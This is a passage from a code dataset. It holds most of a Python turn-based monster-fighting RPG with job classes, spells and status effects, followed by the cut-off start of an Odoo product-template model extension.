time.sleep(1)\n print(\"\\nCongrats! You defeated all the monsters! You win!\")\n time.sleep(1)\n\n # IF ONE ENEMY REMAINS\n elif self.monster or self.monster_pool or self.boss:\n time.sleep(1)\n print(\"\\nYou're dead!\")\n time.sleep(1)\n\n sys.exit()\n\n # SPAWNS PLAYER AND MONSTERS\n def setup(self):\n self.player = self.get_job()\n self.monster_pool = [Goblin(), Troll(), Goblin(), Troll(), Goblin()]\n self.boss = [Dragon()]\n self.monster = self.get_next_monster()\n self.monster_actions = [\"is in no mood to attack\",\n \"looks at you with disdain\",\n \"takes a nap\",\n \"wanders around nervously\",\n \"can't be bothered\",\n \"arrogantly ignores you\",\n \"scratches his nose\"]\n\n self.monster_deaths = [\"dies!\",\n \"screams in agony, and collapses!\",\n \"takes a fatal blow from your {}!\".format(self.player.weapon),\n \"succumbs to his wounds!\",\n \"runs away in despair, and bleeds to death.\",\n \"breathes his last breath... RIP!\"]\n\n input(\"Press [Enter] to start the game.\")\n\n # GETS NEXT MONSTER FROM POOL, AND THEN BOSS\n def get_next_monster(self):\n if len(self.monster_pool) > 0:\n return self.monster_pool.pop(self.monster_pool.index(random.choice(self.monster_pool)))\n else:\n try:\n return self.boss.pop(0)\n except IndexError:\n return None\n\n # MONSTER TURN\n def monster_turn(self):\n self.player.killed_a_monster = False\n\n # IF PLAYER (STILL) CONFUSED, IT FINALLY WEARS OFF \n if 'confused' in self.player.status:\n self.player.status.remove('confused')\n\n # MONSTER DEATH SCENARIOS\n if self.monster.hp <= 0:\n time.sleep(1.5)\n d = self.monster_deaths.pop(self.monster_deaths.index(random.choice(self.monster_deaths)))\n print(\"{}! The {} {} {}\".format(self.monster.battlecry(),\n self.monster.color,\n self.monster.__class__.__name__,\n d))\n\n # MONSTER ATTACK PHASE\n else:\n\n # IF MONSTER DOES ATTACK\n if self.monster.attack_hits(self.monster.weapon):\n time.sleep(1.5)\n print(\"The {} {} attacks you with his {}!\".format(self.monster.color,\n self.monster.__class__.__name__,\n self.monster.weapon))\n\n # HE MAY OR MAY NOT FALL IN THE TRAP\n if self.player.laid_trap:\n if random.randint(0, 100) > 30:\n print(\"CLING! 
The {} steps on the trap and gets stunned!\"\n .format(self.monster.__class__.__name__))\n self.player.laid_trap = False\n return\n\n # IF ATTACK GOES THROUGH, PLAYER TRIES TO DODGE\n time.sleep(1.5)\n print(\"\\nYou try to dodge the attack...\", end='')\n\n # DODGE SUCCESSFUL = END MONSTER'S TURN\n if self.player.dodge(self.player.weapon):\n time.sleep(0.5)\n print(\" and succeed!\")\n time.sleep(1.5)\n return\n\n # DODGE FAILS = PROCEED\n else:\n time.sleep(0.5)\n print(\" but you fail!\")\n dmg = self.monster.get_dmg(self.monster.weapon)\n self.player.hp -= dmg\n time.sleep(1)\n print(\"The {} {} hits you for {} HP.\".format(self.monster.color,\n self.monster.__class__.__name__,\n dmg))\n\n # MONSTER CAN APPLY ON-HIT EFFECT\n time.sleep(0.5)\n if random.randint(0, 100) > 50:\n self.monster.on_hit_effect(self.player)\n time.sleep(1.5)\n\n # CHECK FOR SILENCED STATUS\n self.apply_debuff('silenced')\n\n # WARRIOR COUNTER-ATTACK (MIN LVL 2)\n if self.player.job == \"Warrior\":\n if self.player.xpn > 5:\n if random.randint(0, 100) >= 60:\n print(\"\\nCounter-attack!\")\n self.player_attack_phase()\n\n # IF MONSTER DOESN'T ATTACK \n else:\n time.sleep(1.5)\n print(\"The {} {} \".format(self.monster.color, self.monster.__class__.__name__)\n + random.choice(self.monster_actions) + '...')\n time.sleep(1.5)\n\n # IF PLAYER SPENT 1 TURN SILENCED, RESTORE HIS POWERS\n try:\n self.player.silence_duration -= 1\n print(\" silence duration {}\".format(self.player.silence_duration))\n if self.player.silence_duration == 0:\n del self.player.silence_duration\n if 'silenced' in self.player.status:\n self.player.status.remove('silence')\n self.player.job = self.player.old_job\n if self.player.job == \"Warrior\":\n self.player.base_hp = 14\n if self.player.hp_diff < 0:\n self.player.hp += 4\n except AttributeError:\n pass\n\n #PLAYER TURN\n def player_turn(self):\n time.sleep(0.5)\n\n # CHECK FOR BURNING STATUS\n self.apply_debuff('burning')\n\n # CHECK FOR FROZEN STATUS (PASS TURN UNLESS PLAYER CURES IT)\n if 'frozen' in self.player.status:\n print(\"You are frozen! Can't do anything!\")\n time.sleep(1)\n if self.player.job == \"Priest\" and self.player.spell_1_casts > 0:\n if input(\"Luckily you're a Priest. Use [C]ure? [y/n]\\n> \").lower() in 'cy':\n self.player.spell_1(self.player)\n time.sleep(0.5)\n else:\n return\n else:\n self.player.status.remove('frozen')\n return\n\n # CHECK FOR SILENCED STATUS\n if 'silenced' in self.player.status:\n print(\"You are silenced!\")\n time.sleep(1)\n if self.player.old_job == \"Priest\" and self.player.spell_1_casts > 0:\n if input(\"Luckily you're a Priest. Use [C]ure? [y/n]\\n> \").lower() in 'cy':\n self.player.spell_1(self.player)\n self.player.job = self.player.old_job\n if self.player.job == \"Warrior\":\n self.player.base_hp = 14\n if self.player.hp_diff < 0:\n self.player.hp += 4\n time.sleep(0.5)\n\n else:\n self.player.status.remove('silenced')\n\n # MAIN PHASE\n print(\"\\nYour turn! 
What will you do?\")\n self.player_main_phase()\n\n # PLAYER MAIN ACTION PHASE\n def player_main_phase(self):\n\n # PROMPTS PLAYER FOR ACTION\n self.action_prompt()\n\n # PHYSICAL ATTACK PHASE\n if self.action == 'a':\n\n # IF PLAYER IS CONFUSED, HE MIGHT HURT HIMSELF\n if 'confused' in self.player.status:\n self.player.status.remove('confused')\n if random.randint(0, 100) > 50:\n time.sleep(0.5)\n print(\"\\nYou're so confused!\")\n time.sleep(0.5)\n dmg = self.player.get_dmg(self.player.weapon)\n print(\"You trip and fall down head first on your {},\"\n \"hurting yourself for {} damage!\"\n .format(self.player.weapon, dmg))\n self.player.hp -= dmg\n time.sleep(1)\n\n # IN CASE PLAYER DIES OF CONFUSION\n if self.player.hp <= 0:\n print(\"Silly you... you killed yourself! You lose!\")\n sys.exit()\n else:\n self.player_attack_phase()\n else:\n self.player_attack_phase()\n\n # REST\n elif self.action == 'r':\n self.player.rest()\n time.sleep(0.5)\n print(\"\\nYou rest, and regenerate 1 HP!\")\n\n # QUIT\n elif self.action == 'q':\n time.sleep(0.5)\n print(\"\\nYou flee like a coward!\")\n sys.exit()\n\n # CAST PHASE DEPENDING ON JOB\n else:\n self.player_cast_phase('Sorcerer', 'd', 'g')\n self.player_cast_phase('Priest', 'c', 'h')\n self.player_cast_phase('Hunter', 't', 's')\n\n # PLAYER SPELL CAST PHASE\n def player_cast_phase(self, what_job, action1, action2):\n\n # RESTRICTS ACTIONS TO SPECIFIC JOB\n if self.player.job == what_job:\n\n # CAST SPELL LVL 1\n if self.action == action1:\n if self.player.spell_1_casts > 0:\n self.player.spell_1(self.monster)\n self.player.spell_1_casts -= 1\n else:\n print(\"You can't cast this spell anymore!\")\n self.player_main_phase()\n\n # CAST SPELL LVL 2\n elif self.action == action2:\n if self.player.spell_2_casts > 0:\n self.player.spell_2(self.monster)\n self.player.spell_2_casts -= 1\n\n else:\n print(\"You can't cast this spell anymore!\")\n self.player_main_phase()\n\n # CUSTOM ACTION PROMPT DEPENDING ON JOB\n def action_prompt(self):\n\n # CASE OF SORCERER, PRIEST AND HUNTER\n if not self.player.job in [\"Warrior\", 'Jobless']:\n\n # DISPLAY RELEVANT SPELLS (IF LVL 1 OR LVL 2)\n if self.player.xpn == 5:\n action = input('\\n[A]ttack \\n{} ({}) \\n[R]est \\n[Q]uit\\n\\n> '\n .format(self.player.spell_1_name, self.player.spell_1_casts)).lower()\n else:\n action = input('\\n[A]ttack \\n{} ({}) \\n{} ({}) \\n[R]est \\n[Q]uit\\n\\n> '\n .format(self.player.spell_1_name, self.player.spell_1_casts,\n self.player.spell_2_name, self.player.spell_2_casts)).lower()\n\n # CASE OF WARRIOR OR 'JOBLESS' (NO ACTIVE SPELL)\n else:\n action = input('\\n[A]ttack \\n[R]est \\n[Q]uit\\n\\n> ')\n\n # MAKE SURE THAT ONLY JOB ALLOWED ACTIONS ARE SELECTED\n for job, allowed_actions in {'Jobless': 'arq',\n 'Warrior': 'arq',\n 'Sorcerer': 'arqdg',\n 'Priest': 'arqch',\n 'Hunter': 'arqts'}.items():\n if self.player.job == job:\n if action in allowed_actions and action != '':\n self.action = action\n else:\n self.action_prompt()\n\n # CHECK FOR 'BURNING' OR 'SILENCED', DEBUFF AND APPLIES THE CONSEQUENCES:\n def apply_debuff(self, debuff):\n if debuff in self.player.status:\n\n # BURNING?\n if debuff == 'burning':\n print(\"You're burning! You take 1 damage.\")\n time.sleep(1.5)\n self.player.hp -= 1\n self.player.burn_duration -= 1\n if self.player.burn_duration == 0:\n self.player.status.remove('burning')\n\n # IN CASE THE BURNING KILLS THE PLAYER\n if self.player.hp <= 0:\n time.sleep(1)\n print(\"The fire damage was fatal... 
You die!\")\n time.sleep(1)\n sys.exit()\n\n # SILENCED?\n elif debuff == 'silenced':\n if self.player.silence_duration == 2:\n print(\"You lose all your special powers!\")\n time.sleep(1.5)\n if self.player.job == \"Warrior\":\n if self.player.hp > 10:\n self.player.hp_diff = self.player.hp - self.player.base_hp\n self.player.hp = 10 + self.player.hp_diff\n self.player.base_hp = 10\n if self.player.job != 'Jobless':\n self.player.old_job = self.player.job\n self.player.job = \"Jobless\"\n\n # PLAYER PHYSICAL ATTACK PHASE\n def player_attack_phase(self):\n time.sleep(0.5)\n print(\"\\nYou draw your {} to attack the {}...\".format(self.player.weapon,\n self.monster.__class__.__name__), end='')\n\n # PLAYER HITS\n if self.player.attack_hits(self.player.weapon):\n time.sleep(0.5)\n print(\" and hit!\")\n time.sleep(1)\n print(\"The {} tries to dodge...\".format(self.monster.__class__.__name__), end='')\n sys.stdout.flush()\n\n # MONSTER DODGES\n if self.monster.dodge(self.monster.weapon):\n time.sleep(0.5)\n print(\" and succeeds!\")\n\n # MONSTER DODGE FAILS\n else:\n time.sleep(0.5)\n print(\" but he fails!\")\n dmg = self.player.get_dmg(self.player.weapon)\n self.monster.hp -= dmg\n time.sleep(1)\n print(\"You hit it for {} HP.\".format(dmg))\n\n # PLAYER MISSES\n else:\n sys.stdout.flush()\n time.sleep(0.5)\n print(\" but you miss!\")\n\n # DEAD MONSTER CLEANUP\n def cleanup(self):\n if self.monster.hp <= 0:\n time.sleep(1.5)\n print(\"You have defeated the {} {} !\".format(self.monster.color, self.monster.__class__.__name__))\n self.player.killed_a_monster = True\n time.sleep(0.5)\n print(\"You gain {} XP!\".format(self.monster.xp))\n self.player.xp += self.monster.xp\n\n # PLAYER LEVELS UP\n if self.player.leveled_up():\n time.sleep(1)\n print(\"\\nLEVEL UP! You gain +1 max. damage, and +1 accuracy!\")\n time.sleep(1)\n if self.player.xpn == 5:\n print(\"You learn {}!\".format(self.player.spell_2_name))\n time.sleep(1)\n self.player.max_dmg += 1\n self.player.attack_dice += 1\n self.player.xp -= self.player.xpn\n self.player.xpn += 1\n\n self.monster = self.get_next_monster()\n print('\\n'+'='*90)\n\n # PRINTS RELEVANT FOOTER\n if len(self.boss) != 0:\n input(\"{} enemies remaining. Press [Enter] to go ahead. \"\n .format(len(self.monster_pool)+len(self.boss)))\n else:\n input(\"You've woken up the ancient Dragon! Press [Enter] to go ahead. \")\n\n # INFO ABOUT WHICH SPELLS AVAILABLE FOR WHICH JOBS\n @staticmethod\n def show_jobs():\n print('-'*90)\n print('Jobs:')\n print('-'*90)\n print(\" ◊ [W]arrior: \\t Lv. 1: +4 base HP (Passive).\")\n print(\" \\t Lv. 2: Counter-attack (Passive: 60% chance to counter-attack for free).\\n\")\n print(\" ◊ [S]orcerer: Lv. 1: Drain Life (Inflicts attack damage, and converts them to HP).\")\n print(\" Lv. 2: Greenify (Resets monster color to Green).\\n\")\n print(\" ◊ [P]riest: \\t Lv. 1: Cure (Removes 'burning', 'frozen', 'silenced' and 'confused').\")\n print(\" \\t Lv. 2: Heal (Heals yourself for an amount equal to your attack damage.)\\n\")\n print(\" ◊ [H]unter: \\t Lv. 1: Trap (Lays a trap that can stun the enemy when he attacks).\")\n print(\" \\t Lv. 
2: Snipe (Next attack can't be missed or dodged, and inflicts +1 dmg).\")\n print('-'*90)\n\n # LETS PLAYER CHOOSE THEIR JOB\n def get_job(self):\n print('Choose your job:')\n job_choice = input('[W]arrior, [S]orcerer, [P]riest, [H]unter, or [C] to show job characteristics\\n> ').lower()\n if job_choice in 'wsphc' and job_choice != '':\n if job_choice == 'w':\n return Warrior()\n elif job_choice == 's':\n return Sorcerer()\n elif job_choice == 'p':\n return Priest()\n elif job_choice == 'h':\n return Hunter()\n elif job_choice == 'c':\n self.show_jobs()\n self.get_job()\n else:\n self.get_job()\n\n\nGame() ","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":18305,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"6848437","text":"# -*- coding: utf-'8' \"-*-\"\nfrom openerp import api, models, fields\nfrom openerp.tools.translate import _\n\n__author__ = 'Michael Karrer'\n\n\n# Product Template\n# ATTENTION: There are unported parts for product.template in website_sale_donate.py !\nclass ProductTemplate(models.Model):\n _inherit = 'product.template'\n\n _step_config_fields = ['hide_cart_indicator', 'cart_indicator_name',\n 'hide_product_indicator', 'product_indicator_name',\n 'hide_checkout_indicator', 'checkout_indicator_name',\n 'hide_payment_indicator', 'payment_indicator_name',\n 'hide_confirmation_indicator', 'confirmation_indicator_name']\n\n website_published_start = fields.Datetime('Website Published Start')\n website_published_end = fields.Datetime('Website Published End')\n website_visible = fields.Boolean('Visible in Website (computed)', readonly=True,\n compute=\"compute_website_visible\", store=True)\n\n # Shop Step/Page Indicator Setup\n step_indicator_setup = fields.Boolean(string=\"Individual Step-Indicator Setup\")\n\n step_indicator_ul_class = fields.Char(string=\"Step-Indicator